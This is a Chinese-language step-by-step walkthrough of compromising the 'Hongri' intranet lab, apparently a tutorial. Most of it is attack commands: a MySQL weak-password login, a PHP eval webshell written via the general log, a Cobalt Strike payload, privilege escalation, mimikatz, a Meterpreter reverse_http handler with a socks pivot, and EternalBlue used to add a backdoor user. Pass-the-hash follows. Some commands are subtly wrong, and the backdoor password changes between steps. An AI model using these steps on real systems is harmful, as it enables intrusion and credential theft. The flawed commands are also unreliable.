内网靶场详细渗透(红日靶场一)
字数 1182 2025-08-23 18:31:25
内网靶场详细渗透教学文档(红日靶场一)
环境配置
- 网络环境:内网环境,网段为192.168.1.0/24
- 目标主机:192.168.1.130
- 环境配置可参考文章末尾的参考文献
信息收集阶段
主机发现
netdiscover -r 192.168.1.0/24
端口扫描
nmap -sS -sV -Pn 192.168.1.130
扫描结果显示开放端口:
- 80端口:HTTP服务
- 3389端口:RDP远程桌面
- 3306端口:MySQL数据库
Web渗透阶段
1. 访问80端口
发现phpstudy探针,可用于检测数据库连接情况
2. 数据库弱口令测试
发现存在MySQL弱口令:
- 用户名:root
- 密码:root
3. 数据库权限检查
show global variables like '%secure%'
检查结果:
- 字段为null表示不可写任意目录
- 为空表示可写任意目录
- 指定路径表示只能写入该路径
4. 日志写入Webshell
-- 检查日志功能
show global variables '%general%'
-- 开启日志功能
set global general_log = NO
-- 更改日志路径为web目录
set global general_log_file = 'C:/phpstudy/WWW/test.php'
-- 验证日志路径更改
show global variables '%general%'
-- 写入一句话木马
select '<?php eval($_POST[1])'
5. 连接Webshell
- 使用蚁剑连接上传的木马文件
- 验证PHP代码是否被解析(浏览器访问时不显示源代码表示成功)
权限提升与横向移动
1. 使用CS生成木马
- 生成监听器
- 生成exe木马并上传
- 通过蚁剑虚拟终端执行木马
- CS成功上线
2. 系统信息收集
shell systeminfo
检查补丁情况,发现补丁较少,可进行提权
3. 权限提升
- 右键选择Access → Elevate
- 使用ms14-058漏洞进行提权
- 也可使用其他漏洞和插件
4. 密码获取
使用mimikatz获取密码
内网渗透
方法一:MSF+proxychains+kali
1. CS会话注入MSF
use exploit/multi/handler
set payload windows/meterpreter/reverse_http
set lhost [本机IP]
set lport [监听端口]
exploit
在CS创建foreign监听器,IP和端口与MSF一致
2. 添加路由
run post/multi/manage/autoroute
run autoroute -p # 查看路由
3. 开启socks代理
use auxiliary/server/socks_proxy
set version 4a
set srvhost 0.0.0.0
set srvport 1080
run
jobs # 查看代理状态
4. 配置kali代理
vim /etc/proxychains4.conf
proxychains firefox 192.168.52.138:80
5. 内网主机发现
use post/windows/gather/arp_scanner
set RHOSTS 192.168.52.0/24
set SESSION 1
exploit
6. 端口扫描
proxychains nmap [目标IP]
7. UDP扫描
use auxiliary/scanner/discovery/udp_sweep
set RHOSTS 192.168.52.0/24
exploit
8. 永恒之蓝漏洞利用
use auxiliary/scanner/smb/smb_ms17_010
set RHOSTS 192.168.52.141
exploit
use auxiliary/admin/smb/ms17_010_command
set COMMAND net user
set RHOST 192.168.52.141
exploit
9. 添加用户并开启telnet
set COMMAND net user hack admin.111 /add
set COMMAND sc config tlntsvr start= auto
set COMMAND net start telnet
set COMMAND netstat -an
10. Telnet登录
telnet [目标IP]
# 使用创建的用户名hack和密码admin.123登录
方法二:Windows+CS+Proxifier
1. 端口转发
- 使用CS端口转发工具
- 配置Proxifier代理设置
2. 浏览器代理配置
- 将浏览器exe加入代理规则
- 使浏览器流量走代理通道
3. Hash传递攻击(PTH)
# 获取ntml值
mimikatz
# 进行PTH攻击
shell dir \\IP\c$
4. 横向移动
net view # 获取域内主机
# 使用psexec进行渗透
常见问题与解决方案
1. proxychains使用问题
- 权限问题:尝试切换为普通用户
- nmap扫描失败:检查代理配置和权限
2. Telnet登录问题
- 必须将登录用户加入telnetclients组
- 命令:
net localgroup telnetclients hack /add
总结
本渗透测试流程涵盖了从外网到内网的完整渗透路径,包括:
- 信息收集
- Web渗透
- 权限提升
- 内网横向移动
- 多种渗透方法(MSF+proxychains+kali和Windows+CS+Proxifier)
关键点:
- 日志写入Webshell技术
- CS与MSF联动
- 内网代理配置
- 永恒之蓝漏洞利用
- Hash传递攻击
- 横向移动技术